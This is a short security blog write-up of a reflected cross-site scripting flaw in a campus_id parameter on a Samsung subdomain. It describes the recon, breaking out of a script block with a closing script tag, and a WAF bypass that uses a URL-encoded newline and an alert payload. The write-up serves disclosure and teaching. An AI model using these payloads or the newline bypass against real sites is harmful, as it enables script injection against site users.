Reflected XSS on sgsg.samsung.com

Learn System Security - Reflected XSS on sgsg.samsung.com ~


Like what I do before it, searching for a subdomain with sublist3r and check HTTP code on the subdomain that I found.

I use Google Dorks too, to find some interesting URL.
Until I try this Google Dork:
  • site:sgsg.samsung.com

When I'm using Google Dork above, I found this URL
the source code shows every value from campus_id parameter.
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "Oxford";
     ...

I try with a simple injection.
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "Oxford\"";
     ...

We can't use quotes,
I try with a JavaScript tag.
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "</script>";
     ...

Bam!! the server does not block my request.
Next steps.
Request:
Response:
  • [blocked]
Wutt? when we use <svg/onload=alert`1`//> server blocked the request.
I try with other HTML tags to make XSS and the server blocks every my request too.
and then I think we can use the script tags.

Request:
Response:
  • [blocked]

Again? hmmm..
I think server block the request when detecting tag script or something else.

Time to bypass it.

#Bypass 1
Request:
Response:
  • [blocked]

#Bypass 2
Request:
Response:
  • [blocked]

#Bypass 3
Request:
Response:
  • [blocked]

#Bypass 4
Request:
Response:
  • [blocked]

#Bypass 5
Request:
Response:
  • <script type="text/javascript">
     //<![CDATA[
     var timer;
     var campus_id = "</script><script/
     <k>alert`1`//
    ";
     ...

**Success**

With %0A or URL encode of a new line, we can bypass WAF on Samsung.

Screenshot:

#HappyHacking

0 comments